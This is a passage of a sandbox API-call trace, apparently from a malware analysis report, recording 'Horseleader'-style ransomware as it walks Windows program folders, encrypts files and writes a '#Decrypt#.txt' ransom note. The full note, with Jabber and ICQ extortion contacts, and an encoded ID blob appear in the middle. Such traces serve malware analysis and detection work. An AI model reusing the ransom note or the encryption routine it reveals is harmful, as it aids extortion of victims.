nFileSizeHigh=0x0, nFileSizeLow=0x8c0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ipsptg.xml", cAlternateFileName="")) returned 1 [0234.181] lstrcmpiW (lpString1="ipsptg.xml", lpString2="Windows") returned -1 [0234.181] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml") returned 65 [0234.181] StrStrIW (lpFirst="ipsptg.xml", lpSrch=".horseleader") returned 0x0 [0234.181] lstrcmpW (lpString1="ipsptg.xml", lpString2="#Decrypt#.txt") returned 1 [0234.181] lstrcmpW (lpString1="ipsptg.xml", lpString2="_uninstalling_.png") returned 1 [0234.181] lstrlenW (lpString=".testttjffg") returned 11 [0234.181] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml", lpSrch=".testttjffg") returned 0x0 [0234.181] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.181] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.181] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptg.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.181] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d7a859, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d7a859, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa54, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ipsrom.xml", cAlternateFileName="")) returned 1 [0234.181] lstrcmpiW (lpString1="ipsrom.xml", lpString2="Windows") returned -1 [0234.181] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml") returned 65 [0234.181] StrStrIW (lpFirst="ipsrom.xml", lpSrch=".horseleader") returned 0x0 [0234.181] lstrcmpW (lpString1="ipsrom.xml", lpString2="#Decrypt#.txt") returned 1 [0234.181] lstrcmpW (lpString1="ipsrom.xml", lpString2="_uninstalling_.png") returned 1 [0234.181] lstrlenW (lpString=".testttjffg") returned 11 [0234.181] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml", lpSrch=".testttjffg") returned 0x0 [0234.182] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.182] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.182] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrom.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.182] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27da09b6, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27da09b6, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x9ee, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ipsrus.xml", cAlternateFileName="")) returned 1 [0234.182] lstrcmpiW (lpString1="ipsrus.xml", lpString2="Windows") returned -1 [0234.182] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml") returned 65 [0234.182] StrStrIW (lpFirst="ipsrus.xml", lpSrch=".horseleader") returned 0x0 [0234.182] lstrcmpW (lpString1="ipsrus.xml", lpString2="#Decrypt#.txt") returned 1 [0234.182] lstrcmpW (lpString1="ipsrus.xml", lpString2="_uninstalling_.png") returned 1 [0234.182] lstrlenW (lpString=".testttjffg") returned 11 [0234.182] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml", lpSrch=".testttjffg") returned 0x0 [0234.182] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.182] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.182] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrus.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.183] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27da09b6, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27da09b6, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa08, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ipssrb.xml", cAlternateFileName="")) returned 1 [0234.183] lstrcmpiW (lpString1="ipssrb.xml", lpString2="Windows") returned -1 [0234.183] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml") returned 65 [0234.183] StrStrIW (lpFirst="ipssrb.xml", lpSrch=".horseleader") returned 0x0 [0234.183] lstrcmpW (lpString1="ipssrb.xml", lpString2="#Decrypt#.txt") returned 1 [0234.183] lstrcmpW (lpString1="ipssrb.xml", lpString2="_uninstalling_.png") returned 1 [0234.184] lstrlenW (lpString=".testttjffg") returned 11 [0234.184] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml", lpSrch=".testttjffg") returned 0x0 [0234.184] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.184] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.184] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrb.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.184] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27dc6b13, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27dc6b13, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa24, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ipssrl.xml", cAlternateFileName="")) returned 1 [0234.184] lstrcmpiW (lpString1="ipssrl.xml", lpString2="Windows") returned -1 [0234.184] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml") returned 65 [0234.184] StrStrIW (lpFirst="ipssrl.xml", lpSrch=".horseleader") returned 0x0 [0234.184] lstrcmpW (lpString1="ipssrl.xml", lpString2="#Decrypt#.txt") returned 1 [0234.184] lstrcmpW (lpString1="ipssrl.xml", lpString2="_uninstalling_.png") returned 1 [0234.184] lstrlenW (lpString=".testttjffg") returned 11 [0234.184] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml", lpSrch=".testttjffg") returned 0x0 [0234.184] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.184] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.184] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrl.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.184] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27decc70, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27decc70, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x9d8, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ipssve.xml", cAlternateFileName="")) returned 1 [0234.185] lstrcmpiW (lpString1="ipssve.xml", lpString2="Windows") returned -1 [0234.185] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml") returned 65 [0234.185] StrStrIW (lpFirst="ipssve.xml", lpSrch=".horseleader") returned 0x0 [0234.185] lstrcmpW (lpString1="ipssve.xml", lpString2="#Decrypt#.txt") returned 1 [0234.185] lstrcmpW (lpString1="ipssve.xml", lpString2="_uninstalling_.png") returned 1 [0234.185] lstrlenW (lpString=".testttjffg") returned 11 [0234.185] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml", lpSrch=".testttjffg") returned 0x0 [0234.185] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.185] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.185] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssve.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.185] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="it-IT", cAlternateFileName="")) returned 1 [0234.185] lstrcmpiW (lpString1="it-IT", lpString2="Windows") returned -1 [0234.185] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT") returned 60 [0234.185] lstrcmpW (lpString1="it-IT", lpString2=".") returned 1 [0234.185] lstrcmpW (lpString1="it-IT", lpString2="..") returned 1 [0234.185] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0234.185] GetProcessHeap () returned 0x780000 [0234.185] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0234.185] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\*") returned 62 [0234.185] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0234.186] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0234.186] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\.") returned 62 [0234.186] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0234.186] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="..", cAlternateFileName="")) returned 1 [0234.186] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0234.186] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\..") returned 63 [0234.186] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0234.186] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0234.186] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9e26c68, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xea015e21, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xea015e21, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0234.186] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0234.186] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\tipresx.dll.mui") returned 76 [0234.186] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".horseleader") returned 0x0 [0234.186] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0234.186] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0234.186] lstrlenW (lpString=".testttjffg") returned 11 [0234.186] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\tipresx.dll.mui", lpSrch=".testttjffg") returned 0x0 [0234.186] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0234.186] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0234.187] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\it-it\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.187] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9e26c68, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xea015e21, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xea015e21, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0234.187] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0234.187] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\#Decrypt#.txt") returned 74 [0234.187] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\it-it\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0234.188] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0234.188] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0234.189] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0234.189] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0234.189] CloseHandle (hObject=0x158) returned 1 [0234.189] GetProcessHeap () returned 0x780000 [0234.189] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0234.189] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0234.189] lstrcmpiW (lpString1="ja-JP", lpString2="Windows") returned -1 [0234.190] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP") returned 60 [0234.190] lstrcmpW (lpString1="ja-JP", lpString2=".") returned 1 [0234.190] lstrcmpW (lpString1="ja-JP", lpString2="..") returned 1 [0234.190] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0234.190] GetProcessHeap () returned 0x780000 [0234.190] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0234.190] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\*") returned 62 [0234.190] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0234.191] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0234.191] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\.") returned 62 [0234.191] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0234.191] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="..", cAlternateFileName="")) returned 1 [0234.191] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0234.191] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\..") returned 63 [0234.191] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0234.191] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0234.191] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe68981a0, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe6aad4b6, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe6aad4b6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, 